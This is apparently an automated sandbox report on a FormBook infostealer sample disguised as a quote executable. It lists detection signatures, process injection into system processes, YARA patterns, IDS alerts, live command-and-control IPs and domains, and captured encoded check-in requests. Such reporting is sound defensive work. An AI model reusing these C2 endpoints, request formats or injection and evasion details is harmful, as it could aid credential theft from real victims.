Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quote #270924.exe

Overview

General Information

Sample name:Quote #270924.exe
Analysis ID:1520627
MD5:1018070ffeb3f5fa59a306fa6e6b0f57
SHA1:df752f8bc6b8b9be639a4135c06f401a6701fc35
SHA256:5da3520f7feeae6c6ec79f99c5cc9b5ff73bfd57b29ca80b3aa2fd1a718df59e
Tags:exeuser-TeamDreier
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Quote #270924.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\Quote #270924.exe" MD5: 1018070FFEB3F5FA59A306FA6E6B0F57)
    • svchost.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\Quote #270924.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • HoiWfznxKU.exe (PID: 5016 cmdline: "C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • Robocopy.exe (PID: 7488 cmdline: "C:\Windows\SysWOW64\Robocopy.exe" MD5: 0A1AA3D138103ED9FB645F6B02E41A2F)
          • HoiWfznxKU.exe (PID: 5008 cmdline: "C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7724 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c4d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x144cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c4d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x144cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ed73:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16d72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2fb73:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17b72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Copy From or To System Directory
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\Robocopy.exe", CommandLine: "C:\Windows\SysWOW64\Robocopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\Robocopy.exe, NewProcessName: C:\Windows\SysWOW64\Robocopy.exe, OriginalFileName: C:\Windows\SysWOW64\Robocopy.exe, ParentCommandLine: "C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe" , ParentImage: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe, ParentProcessId: 5016, ParentProcessName: HoiWfznxKU.exe, ProcessCommandLine: "C:\Windows\SysWOW64\Robocopy.exe", ProcessId: 7488, ProcessName: Robocopy.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Quote #270924.exe", CommandLine: "C:\Users\user\Desktop\Quote #270924.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote #270924.exe", ParentImage: C:\Users\user\Desktop\Quote #270924.exe, ParentProcessId: 7364, ParentProcessName: Quote #270924.exe, ProcessCommandLine: "C:\Users\user\Desktop\Quote #270924.exe", ProcessId: 7460, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Quote #270924.exe", CommandLine: "C:\Users\user\Desktop\Quote #270924.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote #270924.exe", ParentImage: C:\Users\user\Desktop\Quote #270924.exe, ParentProcessId: 7364, ParentProcessName: Quote #270924.exe, ProcessCommandLine: "C:\Users\user\Desktop\Quote #270924.exe", ProcessId: 7460, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-27T17:29:46.279961+020028554651A Network Trojan was detected192.168.2.56368865.21.196.9080TCP
            2024-09-27T17:30:26.054926+020028554651A Network Trojan was detected192.168.2.5636953.33.130.19080TCP
            2024-09-27T17:30:40.119661+020028554651A Network Trojan was detected192.168.2.56370138.47.233.1980TCP
            2024-09-27T17:30:54.071710+020028554651A Network Trojan was detected192.168.2.563705172.67.165.2580TCP
            2024-09-27T17:31:09.486959+020028554651A Network Trojan was detected192.168.2.563709208.91.197.2780TCP
            2024-09-27T17:31:24.344519+020028554651A Network Trojan was detected192.168.2.563714162.0.238.4380TCP
            2024-09-27T17:31:37.480561+020028554651A Network Trojan was detected192.168.2.5637183.33.130.19080TCP
            2024-09-27T17:31:50.930043+020028554651A Network Trojan was detected192.168.2.56372285.159.66.9380TCP
            2024-09-27T17:32:04.945053+020028554651A Network Trojan was detected192.168.2.563727160.251.148.2080TCP
            2024-09-27T17:32:19.335928+020028554651A Network Trojan was detected192.168.2.563731208.91.197.3980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-27T17:30:19.046227+020028554641A Network Trojan was detected192.168.2.5636923.33.130.19080TCP
            2024-09-27T17:30:21.408275+020028554641A Network Trojan was detected192.168.2.5636933.33.130.19080TCP
            2024-09-27T17:30:23.081891+020028554641A Network Trojan was detected192.168.2.5636943.33.130.19080TCP
            2024-09-27T17:30:32.493925+020028554641A Network Trojan was detected192.168.2.56369638.47.233.1980TCP
            2024-09-27T17:30:35.077130+020028554641A Network Trojan was detected192.168.2.56369938.47.233.1980TCP
            2024-09-27T17:30:37.596530+020028554641A Network Trojan was detected192.168.2.56370038.47.233.1980TCP
            2024-09-27T17:30:46.412025+020028554641A Network Trojan was detected192.168.2.563702172.67.165.2580TCP
            2024-09-27T17:30:49.024299+020028554641A Network Trojan was detected192.168.2.563703172.67.165.2580TCP
            2024-09-27T17:30:51.502507+020028554641A Network Trojan was detected192.168.2.563704172.67.165.2580TCP
            2024-09-27T17:30:59.952747+020028554641A Network Trojan was detected192.168.2.563706208.91.197.2780TCP
            2024-09-27T17:31:02.507416+020028554641A Network Trojan was detected192.168.2.563707208.91.197.2780TCP
            2024-09-27T17:31:05.060861+020028554641A Network Trojan was detected192.168.2.563708208.91.197.2780TCP
            2024-09-27T17:31:16.579307+020028554641A Network Trojan was detected192.168.2.563711162.0.238.4380TCP
            2024-09-27T17:31:19.255760+020028554641A Network Trojan was detected192.168.2.563712162.0.238.4380TCP
            2024-09-27T17:31:21.684344+020028554641A Network Trojan was detected192.168.2.563713162.0.238.4380TCP
            2024-09-27T17:31:29.887845+020028554641A Network Trojan was detected192.168.2.5637153.33.130.19080TCP
            2024-09-27T17:31:33.455688+020028554641A Network Trojan was detected192.168.2.5637163.33.130.19080TCP
            2024-09-27T17:31:35.999476+020028554641A Network Trojan was detected192.168.2.5637173.33.130.19080TCP
            2024-09-27T17:31:44.108829+020028554641A Network Trojan was detected192.168.2.56371985.159.66.9380TCP
            2024-09-27T17:31:46.655732+020028554641A Network Trojan was detected192.168.2.56372085.159.66.9380TCP
            2024-09-27T17:31:49.202624+020028554641A Network Trojan was detected192.168.2.56372185.159.66.9380TCP
            2024-09-27T17:31:57.288710+020028554641A Network Trojan was detected192.168.2.563723160.251.148.2080TCP
            2024-09-27T17:31:59.824590+020028554641A Network Trojan was detected192.168.2.563725160.251.148.2080TCP
            2024-09-27T17:32:02.545176+020028554641A Network Trojan was detected192.168.2.563726160.251.148.2080TCP
            2024-09-27T17:32:10.965892+020028554641A Network Trojan was detected192.168.2.563728208.91.197.3980TCP
            2024-09-27T17:32:13.559112+020028554641A Network Trojan was detected192.168.2.563729208.91.197.3980TCP
            2024-09-27T17:32:16.103969+020028554641A Network Trojan was detected192.168.2.563730208.91.197.3980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-27T17:31:33.455688+020028563181A Network Trojan was detected192.168.2.5637163.33.130.19080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: Quote #270924.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: Quote #270924.exeReversingLabs: Detection: 36%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3985113849.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3986045977.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2275425308.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3986013036.0000000002C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Quote #270924.exeJoe Sandbox ML: detected
            Source: Quote #270924.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: robocopy.pdb source: svchost.exe, 00000002.00000003.2241073869.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2241073869.000000000083B000.00000004.00000020.00020000.00000000.sdmp, HoiWfznxKU.exe, 00000003.00000002.3985552449.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HoiWfznxKU.exe, 00000003.00000000.2197455182.000000000057E000.00000002.00000001.01000000.00000004.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344151814.000000000057E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000002.00000003.2175621784.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2177443732.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2273408826.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2277774868.000000000460F000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2275494698.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000002.00000003.2175621784.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2177443732.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2273408826.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, Robocopy.exe, 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2277774868.000000000460F000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2275494698.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: robocopy.pdbGCTL source: svchost.exe, 00000002.00000003.2241073869.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2241073869.000000000083B000.00000004.00000020.00020000.00000000.sdmp, HoiWfznxKU.exe, 00000003.00000002.3985552449.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: Robocopy.exe, 00000004.00000002.3987313418.0000000004DEC000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3985211901.0000000002D35000.00000004.00000020.00020000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344639138.0000000002A0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2561116373.0000000006A0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: Robocopy.exe, 00000004.00000002.3987313418.0000000004DEC000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3985211901.0000000002D35000.00000004.00000020.00020000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344639138.0000000002A0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2561116373.0000000006A0C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0081C8D0 FindFirstFileW,FindNextFileW,FindClose,4_2_0081C8D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi2_2_0041928D
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4x nop then xor eax, eax4_2_00809C00
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4x nop then pop edi4_2_00815BEA
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4x nop then mov ebx, 00000004h4_2_046B04E8
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then mov ebx, 00000004h7_2_000002D1067BC4E8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63688 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63716 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.5:63716 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63705 -> 172.67.165.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63707 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63700 -> 38.47.233.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63728 -> 208.91.197.39:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63727 -> 160.251.148.20:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63704 -> 172.67.165.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63706 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63719 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63722 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63708 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63703 -> 172.67.165.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63694 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63731 -> 208.91.197.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63712 -> 162.0.238.43:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63723 -> 160.251.148.20:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63713 -> 162.0.238.43:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63709 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63699 -> 38.47.233.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63696 -> 38.47.233.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63726 -> 160.251.148.20:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63714 -> 162.0.238.43:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63730 -> 208.91.197.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63715 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63720 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63718 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63717 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63692 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63729 -> 208.91.197.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63693 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63702 -> 172.67.165.25:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63695 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63725 -> 160.251.148.20:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63701 -> 38.47.233.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63711 -> 162.0.238.43:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63721 -> 85.159.66.93:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.030003302.xyz
            Source: Joe Sandbox ViewIP Address: 162.0.238.43 162.0.238.43
            Source: Joe Sandbox ViewIP Address: 65.21.196.90 65.21.196.90
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /1nuz/?Ah=39evZXa6m7baCAiDcr0ch6V4fD09WsXkaMbScS7vY88jTdTJUv9E9AetrBPXqBlycVnLEijqhZPiEuH/pw4Oq8ZNp7wpFj1U/P2B+qNM5mXkMr/9uw3rZ9uOJdcOYzpfEQ==&6RGD=r8eHwnMpb2dxK HTTP/1.1Host: www.030003302.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /974s/?Ah=woBqQkVhEnZr0PORhZ6z2TjABxOeyQlLpumkFgr+omNv0XEbVjbEhcV/qAVpymWGpDThRtO2eu+z9gp0JATUVQjZP0Y2t77DZFNVy7Otm7ne66vNCWn1tABYRqLOiyRBkA==&6RGD=r8eHwnMpb2dxK HTTP/1.1Host: www.searchgpt.homesAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /mkti/?6RGD=r8eHwnMpb2dxK&Ah=jnThCjOJiNX3HI/1X6ra8iqRT8LvO5Bl0cjrkRPRR4aUtJ5UnZH8goi0lUnBvvC66wXnOPoFvnQ+LE8o+1Q4j9xZYpeOMfjH2lF0fJzOXlNgjT3mfY10J4nKlD3uClfrXg== HTTP/1.1Host: www.2q63f.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /f66t/?Ah=wMNxngytVvT+xiDvhZKVBLBZglmuZQUCx/WcIyOXqUp4vIwezETUsTI6SXRinkgbo4oPfyScfq3TTLYR3fLN41mF5bem5ZFkurSKCCFsELulDfuy7v5fTUVM4J27kpDPZg==&6RGD=r8eHwnMpb2dxK HTTP/1.1Host: www.b5x7vk.agencyAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
